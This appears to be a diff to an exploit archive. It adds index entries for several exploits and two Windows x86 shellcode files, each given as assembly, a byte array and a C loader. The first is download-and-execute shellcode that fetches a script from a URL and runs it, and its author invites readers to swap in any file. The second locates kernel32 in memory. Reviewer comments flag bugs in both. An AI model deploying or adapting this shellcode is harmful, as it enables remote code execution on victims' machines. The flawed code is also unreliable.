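 50689,exploits/linux/local/50689.txt,"PolicyKit-1 0.105-31 - Privilege Escalation",1970-01-01,"Lance Biggerstaff",local,linux,
 50691,exploits/windows/local/50691.txt,"Mozilla Firefox 67 - Array.pop JIT Type Confusion",1970-01-01,"Forrest Orr",local,windows,
 50696,exploits/macos/local/50696.py,"Fetch Softworks Fetch FTP Client 5.8 - Remote CPU Consumption (Denial of Service)",1970-01-01,LiquidWorm,local,macos,
+50708,exploits/windows/local/50708.txt,"FLAME II MODEM USB - Unquoted Service Path",1970-01-01,"Ismael Nava",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139
@@ -44784,3 +44785,8 @@ id,file,description,date,author,type,platform,port
 50704,exploits/php/webapps/50704.txt,"WordPress Plugin Product Slider for WooCommerce 1.13.21 - Cross Site Scripting (XSS)",1970-01-01,0xB9,webapps,php,
 50705,exploits/php/webapps/50705.txt,"WordPress Plugin Post Grid 2.1.1 - Cross Site Scripting (XSS)",1970-01-01,0xB9,webapps,php,
 50706,exploits/php/webapps/50706.txt,"WordPress Plugin Learnpress 4.1.4.1 - Arbitrary Image Renaming",1970-01-01,"Ceylan BOZOĞULLARINDAN",webapps,php,
+50707,exploits/php/webapps/50707.py,"WBCE CMS 1.5.2 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Antonio Cuomo",webapps,php,
+50709,exploits/php/webapps/50709.txt,"WordPress Plugin IP2Location Country Blocker 2.26.7 - Stored Cross Site Scripting (XSS) (Authenticated)",1970-01-01,"Ahmet Serkan Ari",webapps,php,
+50712,exploits/multiple/webapps/50712.rb,"Servisnet Tessa - Privilege Escalation (Metasploit)",1970-01-01,AkkuS,webapps,multiple,
+50713,exploits/multiple/webapps/50713.rb,"Servisnet Tessa - MQTT Credentials Dump (Unauthenticated) (Metasploit)",1970-01-01,AkkuS,webapps,multiple,
+50714,exploits/multiple/webapps/50714.rb,"Servisnet Tessa - Add sysAdmin User (Unauthenticated) (Metasploit)",1970-01-01,AkkuS,webapps,multiple,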



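--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@@ -1043,3 +1043,5 @@ id,file,description,date,author,type,platform
 50368,shellcodes/windows_x86/50368.c,"Windows/x86 - WinExec PopCalc PEB & Export Directory Table NullFree Dynamic Shellcode (178 bytes)",1970-01-01,"Daniel Ortiz",shellcode,windows_x86
 50369,shellcodes/windows_x86/50369.c,"Windows/x86 - MessageBoxA PEB & Export Address Table NullFree/Dynamic Shellcode (230 bytes)",1970-01-01,"Daniel Ortiz",shellcode,windows_x86
 50384,shellcodes/windows_x86/50384.c,"Windows/x86 - Bind TCP shellcode / Dynamic PEB & EDT method null-free Shellcode (415 bytes)",1970-01-01,"Daniel Ortiz",shellcode,windows_x86
+50710,shellcodes/windows_x86/50710.asm,"Windows/x86 - Download File and Execute / Dynamic PEB & EDT method Shellcode (458 bytes)",1970-01-01,Techryptic,shellcode,windows_x86
+50711,shellcodes/windows_x86/50711.asm,"Windows/x86 - Locate kernel32 base address / Memory Sieve method Shellcode (133 bytes)",1970-01-01,"Tarek Ahmed",shellcode,windows_x86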



@ -0,0 +1,300 @@
; Exploit Title: Windows/x86 - Download File and Execute / Dynamic PEB & EDT method Shellcode (458 bytes)
; Exploit Author: Techryptic (@Tech)
; Date: 2022-01-31
; Tested on: WIN7X86
; Shoutout to #848 Advanced Software Exploitation and DSU.
; Description:
; The shellcode works in three parts. The first part and API call is using the Kernel32.dll and calling both CreateProcessA and LoadLibraryA function. Moving onto the next API call, it utilizes the urlmon.dll and calls the URLDownloadToFileA function. The objective of this call is to download a file from our malicious URL. Finally, the third API call is using the WinExec function to run the command, which will run the file that was downloaded.
; the PEB method to locate the baseAddress of the required module and the Export Directory Table to locate symbols.
; Also the shellcode uses a hash function to gather dynamically the required symbols without worry about the length.
; Feel free to change which file is being downloaded, and what command to run the file. For example, if set to download a .vbs script, you can use the command 'cscript shellcode.vbs'.
[BITS 32]
mainentrypoint:
call geteip
geteip:
pop edx ; EDX is now base for function
lea edx, [edx-5]
mov ebp, esp
sub esp, 1000h
; Locate kernel32.dll
push edx
mov ebx, 0x4b1ffe8e
call get_module_address
pop edx
; Build kernel32.dll API function pointer table
push ebp
push edx
mov ebp, eax
lea esi, [EDX + KERNEL32HASHTABLE]
lea edi, [EDX + KERNEL32FUNCTIONSTABLE]
call get_api_address
pop edx
pop ebp
; Call LoadLibaryA to get urlmon.dll into memory
push ebp
push edx
lea eax, [EDX + URLMON]
push eax
call [EDX + LoadLibraryA]
pop edx
pop ebp
; Build urlmon.dll API function pointer table
push ebp
push edx
mov ebp, eax
lea esi, [EDX + URLMONHASHTABLE]
lea edi, [EDX + URLMONFUNCTIONSTABLE]
call get_api_address
pop edx
pop ebp
; Call URLDownloadToFileA
; pCaller NULL, URL, FILENAME, 0, 0
push eax
push 0
push 0
lea edi, [EDX + URL]
lea esi, [EDX + FILENAME]
push esi
push edi
push 0
call eax
;and esp, 0xfffffff0; Using the WinExec API to call com
call geteip2
geteip2:
pop edx ; EDX is now base for function
lea edx, [edx-122] ; yes.
mov ebp, esp
sub esp, 1000h
; Locate kernel32.dll
push edx
mov ebx, 0x4b1ffe8e ; kernel32.dll module hash
call get_module_address ; Sets EAX to kernel32.<Location>
pop edx
; Build kernel32.dll API function pointer table
push ebp
push edx
mov ebp, eax
lea esi, [EDX + WINKERNEL32HASHTABLE]
lea edi, [EDX + WINKERNEL32FUNCTIONSTABLE]
call get_api_address ; sets EAX to kernel32.WinExec function.
pop edx
pop ebp
; call winexec api
lea esi, [EDX + CMD] ;change back to EXE
push 0x00
push esi
push dword [EDX + WINKERNEL32_WINEXEC]
pop eax
call eax
get_module_address:
;walk PEB find target module
cld
xor edi, edi
mov edi, [FS:0x30]
mov edi, [edi+0xC]
mov edi, [edi+0x14]
next_module_loop:
mov esi, [edi+0x28]
xor edx, edx
module_hash_loop:
lodsw
test al, al
jz end_module_hash_loop
cmp al, 0x41
jb end_hash_check
cmp al, 0x5A
ja end_hash_check
or al, 0x20
end_hash_check:
rol edx, 7
xor dl, al
jmp module_hash_loop
end_module_hash_loop:
cmp edx, ebx
mov eax, [edi+0x10]
mov edi, [edi]
jnz next_module_loop
ret
get_api_address:
mov edx, ebp
add edx, [edx+3Ch]
mov edx, [edx+78h]
add edx, ebp
mov ebx, [edx+20h]
add ebx, ebp
xor ecx, ecx
load_api_hash:
push edi
push esi
mov esi, [esi]
load_api_name:
mov edi, [ebx]
add edi, ebp
push edx
xor edx, edx
create_hash_loop:
rol edx, 7
xor dl, [edi]
inc edi
cmp byte [edi], 0
jnz create_hash_loop
xchg eax, edx
pop edx
cmp eax, esi
jz load_api_addy
add ebx, 4
inc ecx
cmp [edx+18h], ecx
jnz load_api_name
pop esi
pop edi
ret
load_api_addy:
pop esi
pop edi
lodsd
push esi
push ebx
mov ebx, ebp
mov esi, ebx
add ebx, [edx+24h]
lea eax, [ebx+ecx*2]
movzx eax, word [eax]
lea eax, [esi+eax*4]
add eax, [edx+1ch]
mov eax, [eax]
add eax, esi
stosd
pop ebx
pop esi
add ebx, 4
inc ecx
cmp dword [esi], 0FFFFh
jnz load_api_hash
ret
CMD:
db "cscript cats-dl.vbs", 0 ; Command that will run
FILENAME:
db "cats-dl.vbs", 0 ; Name of the file being written to disk
URL:
db "http://127.0.0.1:8080/cats.vbs", 0 ; Use a non-malicious file extension
URLMON:
db "urlmon.dll", 0
KERNEL32HASHTABLE:
dd 0x46318ac7 ; CreateProcessA
dd 0xc8ac8026 ; LoadLibraryA
dd 0xFFFF
KERNEL32FUNCTIONSTABLE:
CreateProcessA:
dd 0x00000001
LoadLibraryA:
dd 0x00000002
WINKERNEL32HASHTABLE:
dd 0xe8bf6dad ; WinExec
dd 0xFFFF ; make sure to end with this token
WINKERNEL32FUNCTIONSTABLE:
WINKERNEL32_WINEXEC dd 0x00000000
URLMONHASHTABLE:
dd 0xd95d2399 ; URLDownloadToFileA function
dd 0xFFFF
URLMONFUNCTIONSTABLE:
URLDownloadToFileA:
dd 0x00000003
[*]================================= POC =============================== [*]
#include <windows.h>
#include <stdio.h>
// nasm -f win32 shellcode.asm -o shellcode.o
// objdump -D ./shellcode.o |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
char shellcode[] =
"\xe8\x00\x00\x00\x00\x5a\x8d\x52\xfb\x89\xe5\x81\xec\x00\x10"
"\x00\x00\x52\xbb\x8e\xfe\x1f\x4b\xe8\x9d\x00\x00\x00\x5a\x55"
"\x52\x89\xc5\x8d\xb2\x9e\x01\x00\x00\x8d\xba\xaa\x01\x00\x00"
"\xe8\xbd\x00\x00\x00\x5a\x5d\x55\x52\x8d\x82\x93\x01\x00\x00"
"\x50\xff\x92\xae\x01\x00\x00\x5a\x5d\x55\x52\x89\xc5\x8d\xb2"
"\xbe\x01\x00\x00\x8d\xba\xc6\x01\x00\x00\xe8\x95\x00\x00\x00"
"\x5a\x5d\x50\x6a\x00\x6a\x00\x8d\xba\x74\x01\x00\x00\x8d\xb2"
"\x68\x01\x00\x00\x56\x57\x6a\x00\xff\xd0\xe8\x00\x00\x00\x00"
"\x5a\x8d\x52\x86\x89\xe5\x81\xec\x00\x10\x00\x00\x52\xbb\x8e"
"\xfe\x1f\x4b\xe8\x2a\x00\x00\x00\x5a\x55\x52\x89\xc5\x8d\xb2"
"\xb2\x01\x00\x00\x8d\xba\xba\x01\x00\x00\xe8\x4a\x00\x00\x00"
"\x5a\x5d\x8d\xb2\x54\x01\x00\x00\x6a\x00\x56\xff\xb2\xba\x01"
"\x00\x00\x58\xff\xd0\xfc\x31\xff\x64\x8b\x3d\x30\x00\x00\x00"
"\x8b\x7f\x0c\x8b\x7f\x14\x8b\x77\x28\x31\xd2\x66\xad\x84\xc0"
"\x74\x11\x3c\x41\x72\x06\x3c\x5a\x77\x02\x0c\x20\xc1\xc2\x07"
"\x30\xc2\xeb\xe9\x39\xda\x8b\x47\x10\x8b\x3f\x75\xdb\xc3\x89"
"\xea\x03\x52\x3c\x8b\x52\x78\x01\xea\x8b\x5a\x20\x01\xeb\x31"
"\xc9\x57\x56\x8b\x36\x8b\x3b\x01\xef\x52\x31\xd2\xc1\xc2\x07"
"\x32\x17\x47\x80\x3f\x00\x75\xf5\x92\x5a\x39\xf0\x74\x0c\x83"
"\xc3\x04\x41\x39\x4a\x18\x75\xdf\x5e\x5f\xc3\x5e\x5f\xad\x56"
"\x53\x89\xeb\x89\xde\x03\x5a\x24\x8d\x04\x4b\x0f\xb7\x00\x8d"
"\x04\x86\x03\x42\x1c\x8b\x00\x01\xf0\xab\x5b\x5e\x83\xc3\x04"
"\x41\x81\x3e\xff\xff\x00\x00\x75\xad\xc3\x63\x73\x63\x72\x69"
"\x70\x74\x20\x63\x61\x74\x73\x2d\x64\x6c\x2e\x76\x62\x73\x00"
"\x63\x61\x74\x73\x2d\x64\x6c\x2e\x76\x62\x73\x00\x68\x74\x74"
"\x70\x3a\x2f\x2f\x31\x32\x37\x2e\x30\x2e\x30\x2e\x31\x3a\x38"
"\x30\x38\x30\x2f\x63\x61\x74\x73\x2e\x76\x62\x73\x00\x75\x72"
"\x6c\x6d\x6f\x6e\x2e\x64\x6c\x6c\x00\xc7\x8a\x31\x46\x26\x80"
"\xac\xc8\xff\xff\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\xad"
"\x6d\xbf\xe8\xff\xff\x00\x00\x00\x00\x00\x00\x99\x23\x5d\xd9"
"\xff\xff\x00\x00\x03\x00\x00\x00";
int main(int argc, char **argv) {
HINSTANCE hInstLib = LoadLibrary(TEXT("user32.dll"));
int i = 0, len = 0, target_addy = 0, offset = 0x0;
void*stage = VirtualAlloc(0, 0x1000, 0x1000,0x40 );
printf("[*] Memory allocated: 0x%08x\n", stage);
len = sizeof(shellcode);
printf("[*] Size of Shellcode: %08x\n", len);
memmove(stage, shellcode, 0x1000);
printf("[*] Shellcode copied\n");
target_addy = (char*)stage + offset;
printf("[*] Adjusting offset: 0x%08x\n", target_addy);
__asm {
int 3
mov eax, target_addy
jmp eax
}
}
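Review bot: `memmove(stage, shellcode, 0x1000);` in the PoC's main() copies 0x1000 bytes out of a `shellcode[]` array that is only `sizeof(shellcode)` bytes long (the `len` computed two lines earlier and then never used), an out-of-bounds read of the harness's own data section; it should be `memmove(stage, shellcode, len);`. The constant in `lea edx, [edx-122] ; yes.` is a hand-counted distance from mainentrypoint to geteip2, and by my count of the listing (and of the blob, where the second `\xe8\x00\x00\x00\x00` sits at offset 115) geteip2 is 120 bytes in, which would leave EDX two bytes short of the base the data displacements assume — worth re-verifying, and either way the comment should state what the constant is and that `geteip2 - mainentrypoint` lets the assembler compute it. The description says the first part is "calling both CreateProcessA and LoadLibraryA", but CreateProcessA is only hashed into KERNEL32HASHTABLE and its slot under KERNEL32FUNCTIONSTABLE is never read, so the text should name LoadLibraryA alone or the dead entry be dropped. The commented-out `;and esp, 0xfffffff0` and the unused `hInstLib = LoadLibrary(TEXT("user32.dll"))` in main() are leftover dead code.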


@ -0,0 +1,127 @@
; Shellcode Title: Windows/x86 - Locate kernel32 base address / Memory Sieve method Shellcode (133 bytes)
; Description:
; This shellcode is a new method to find kernel32 base address by parsing .text section of memory to find a pointer to kernel32 API.
; Date: 1/26/2022
; Shellcode Author: Tarek Ahmed
; Tested on: Microsoft Windows 7, and 10
/*
MIT License
Copyright (c) 2022 Tarek Ahmed
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
xor eax, eax
cdq
pop eax ; get the return address of .text section where the call of exec happened.
push eax
sub esp, 0x8 ; Reserve space on stack for variables
xor ecx, ecx
checkFirstByte: ; This will start finding the first two bytes of the instruction mov dword ptr[!!!]
inc ecx
mov edx, dword ptr[eax+ecx]
cmp dl, 0xff
jne checkFirstByte
cmp byte ptr[eax+ecx+1], 0x15
jne checkFirstByte
jmp foundByte
foundByte:
mov bl, byte ptr [eax+ecx+5]
cmp bl, 0 ; make sure we don't step on next instruction
je foundPtr
jmp checkFirstByte
foundPtr:
xor ebx, ebx
mov ebx, dword ptr[eax + ecx + 2]
mov edi, [ebx]
shr edi, 28 ; We found pointer to an api, check if it start with 7 e.g. 0x7000000
cmp edi, 7
je foundPossibleAddr ; If it starts with 7, then we have a possible kernel32 address
jmp checkFirstByte
foundPossibleAddr:
mov ebx, [ebx]
xor edx, edx
mov dx, 0x1001
add edx, 0xefff
findMZ:
sub ebx, edx ; we need to subtract 0x10000 to get the base
mov bx, dx
mov ax, [ebx]
cmp ax, 0x5a4d ; Check if it's a PE file which starts with "MZ"
jne findMZ ; If not, then subtract 0x10000 again to go one more page down.
mov edi, [ebx + 0x3c] ; Finally we found a possible DLL file, we need to parse it now.
add edi, ebx
mov edi, [edi + 0x78]
add edi, ebx
mov edi, [edi + 0xc]
add edi, ebx
add edi, 4
xor eax, eax
push eax
push 0x6c6c642e ; .dll
push 0x32334c45 ; ELE32
mov esi, esp ; We don't need the whole name, just ELE32.dll
checkKernel :
mov edx, ecx
mov ecx, 8
cld
repe cmpsb
cmp ecx, 0
jne checkFirstByte ; If we pass this check then we found our kernel32 base
*/
#include <windows.h>
#include <iostream>
#include <stdlib.h>
#include <stdio.h>
unsigned char code[] = "\x31\xC0\x99\x58\x50\x83\xEC\x08\x31\xC9\x41\x8B\x14\x08\x80\xFA\xFF\x75\xF7\x80\x7C\x08\x01\x15\x75\xF0\xEB\x00\x8A\x5C\x08\x05\x80\xFB\x00\x74\x02\xEB\xE3\x31\xDB\x8B\x5C\x08\x02\x8B\x3B\xC1\xEF\x1C\x83\xFF\x07\x74\x02\xEB\xD1\x8B\x1B\x31\xD2\x66\xBA\x01\x10\x81\xC2\xFF\xEF\x00\x00\x29\xD3\x66\x89\xD3\x66\x8B\x03\x66\x3D\x4D\x5A\x75\xF2\x8B\x7B\x3C\x01\xDF\x8B\x7F\x78\x01\xDF\x8B\x7F\x0C\x01\xDF\x83\xC7\x04\x31\xC0\x50\x68\x2E\x64\x6C\x6C\x68\x45\x4C\x33\x32\x89\xE6\x89\xCA\xB9\x08\x00\x00\x00\xFC\xF3\xA6\x83\xF9\x00\x75\x85";
int main()
{
void* exec = VirtualAlloc(0, sizeof(code), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(exec, code, sizeof(code));
((void(*)())exec)();
return 0;
}
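Review bot: The retry at `jne checkFirstByte` (the listing's last instruction) cannot work as written: by then `xor eax, eax` has zeroed the .text address that `mov edx, dword ptr[eax+ecx]` indexes, and `mov ecx, 8` followed by `repe cmpsb` has replaced the search index with a leftover count of 0–7, so a failed name comparison re-enters the scan at `[ecx]` near address zero rather than continuing past the rejected candidate (the copy of ecx saved in edx is never restored, and edx is overwritten on the next iteration anyway). The listing also ends on that `jne` with no `ret` and no documented result register, so on a match execution runs off the end of `code[]` into the array's terminating NUL byte; a comment stating where the caller is expected to read the kernel32 base (ebx, as set by the `findMZ` loop) and that a `ret` is still missing would make the contract explicit. `xor eax, eax` / `cdq` at the top are dead since `pop eax` overwrites eax and edx is reassigned before use, and `jmp foundByte` jumps to the very next instruction. The `shr edi, 28` / `cmp edi, 7` heuristic assumes the API pointer lies in the 0x70000000–0x7FFFFFFF range, an address-layout assumption that the header ("Tested on: Microsoft Windows 7, and 10") should state as a limitation rather than leave implicit.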